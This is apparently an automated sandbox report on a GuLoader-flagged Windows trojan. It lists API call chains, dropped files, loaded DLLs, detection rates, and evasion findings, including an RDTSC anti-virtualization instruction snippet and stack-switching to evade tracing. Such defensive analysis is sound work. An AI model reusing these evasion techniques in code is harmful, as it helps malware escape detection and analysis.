      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeCode function: 0_2_0040535C GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_0040535C
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeCode function: 0_2_00403348 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403348
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeFile created: C:\Windows\resources\0809Jump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeFile created: C:\Windows\Arder.lnkJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeCode function: 0_2_004069450_2_00406945
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeCode function: 0_2_0040711C0_2_0040711C
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeCode function: 0_2_700E1A980_2_700E1A98
      Source: Osb7hkGfAb.exeStatic PE information: invalid certificate
      Source: Osb7hkGfAb.exe, 00000000.00000000.1462667120.0000000000458000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameuganderens.exeDVarFileInfo$ vs Osb7hkGfAb.exe
      Source: Osb7hkGfAb.exe, 00000006.00000000.2121177935.0000000000458000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameuganderens.exeDVarFileInfo$ vs Osb7hkGfAb.exe
      Source: Osb7hkGfAb.exeBinary or memory string: OriginalFilenameuganderens.exeDVarFileInfo$ vs Osb7hkGfAb.exe
      Source: Osb7hkGfAb.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: classification engineClassification label: mal76.troj.evad.winEXE@3/8@2/2
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeCode function: 0_2_00403348 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403348
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeCode function: 0_2_0040460D GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_0040460D
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeCode function: 0_2_0040216B CoCreateInstance,MultiByteToWideChar,0_2_0040216B
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeFile created: C:\Users\user\tranchetJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeFile created: C:\Users\user\AppData\Local\Temp\nsi675E.tmpJump to behavior
      Source: Osb7hkGfAb.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: Osb7hkGfAb.exeReversingLabs: Detection: 75%
      Source: Osb7hkGfAb.exeVirustotal: Detection: 68%
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeFile read: C:\Users\user\Desktop\Osb7hkGfAb.exeJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\Osb7hkGfAb.exe "C:\Users\user\Desktop\Osb7hkGfAb.exe"
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess created: C:\Users\user\Desktop\Osb7hkGfAb.exe "C:\Users\user\Desktop\Osb7hkGfAb.exe"
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess created: C:\Users\user\Desktop\Osb7hkGfAb.exe "C:\Users\user\Desktop\Osb7hkGfAb.exe"Jump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeSection loaded: dwmapi.dllJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeSection loaded: oleacc.dllJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeSection loaded: version.dllJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeSection loaded: shfolder.dllJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeSection loaded: powrprof.dllJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeSection loaded: wkscli.dllJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeSection loaded: umpdc.dllJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeSection loaded: schannel.dllJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeSection loaded: dpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
      Source: Arder.lnk.0.drLNK file: ..\Users\user\Disannex.And37
      Source: Osb7hkGfAb.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: mshtml.pdb source: Osb7hkGfAb.exe, 00000006.00000001.2123046241.0000000000649000.00000020.00000001.01000000.00000007.sdmp
      Source: Binary string: mshtml.pdbUGP source: Osb7hkGfAb.exe, 00000006.00000001.2123046241.0000000000649000.00000020.00000001.01000000.00000007.sdmp

      Data Obfuscation

      barindex
      Yara detected GuLoader
      Source: Yara matchFile source: 00000006.00000002.3327433008.00000000017C6000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.2779618167.0000000002A16000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeCode function: 0_2_700E1A98 GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,0_2_700E1A98
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeCode function: 0_2_700E2F60 push eax; ret 0_2_700E2F8E
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeFile created: C:\Users\user\AppData\Local\Temp\nsc72B9.tmp\System.dllJump to dropped file
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion

      barindex
      Switches to a custom stack to bypass stack traces
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeAPI/Special instruction interceptor: Address: 32B3683
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeAPI/Special instruction interceptor: Address: 2063683
      Tries to detect virtualization through RDTSC time measurements
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeRDTSC instruction interceptor: First address: 328CD06 second address: 328CD06 instructions: 0x00000000 rdtsc 0x00000002 cmp ch, bh 0x00000004 cmp ebx, ecx 0x00000006 jc 00007FD5A0E88B36h 0x00000008 inc ebp 0x00000009 inc ebx 0x0000000a test ah, ch 0x0000000c rdtsc
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeRDTSC instruction interceptor: First address: 203CD06 second address: 203CD06 instructions: 0x00000000 rdtsc 0x00000002 cmp ch, bh 0x00000004 cmp ebx, ecx 0x00000006 jc 00007FD5A0EA9ED6h 0x00000008 inc ebp 0x00000009 inc ebx 0x0000000a test ah, ch 0x0000000c rdtsc
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsc72B9.tmp\System.dllJump to dropped file
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exe TID: 3540Thread sleep time: -80000s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeLast function: Thread delayed
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeCode function: 0_2_0040646B FindFirstFileA,FindClose,0_2_0040646B
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeCode function: 0_2_004027A1 FindFirstFileA,0_2_004027A1
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeCode function: 0_2_004058BF GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_004058BF
      Source: Osb7hkGfAb.exe, 00000006.00000002.3330134810.0000000002DD5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWpk
      Source: Osb7hkGfAb.exe, 00000006.00000002.3330134810.0000000002DFF000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2828161142.0000000002DFF000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2839598749.0000000002DFF000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2584587395.0000000002DFF000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2595591638.0000000002DFF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeAPI call chain: ExitProcess graph end nodegraph_0-3944
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeAPI call chain: ExitProcess graph end nodegraph_0-4120
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeCode function: 0_2_700E1A98 GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,0_2_700E1A98
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess created: C:\Users\user\Desktop\Osb7hkGfAb.exe "C:\Users\user\Desktop\Osb7hkGfAb.exe"Jump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeCode function: 0_2_00403348 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403348

      Mitre Att&ck Matrix

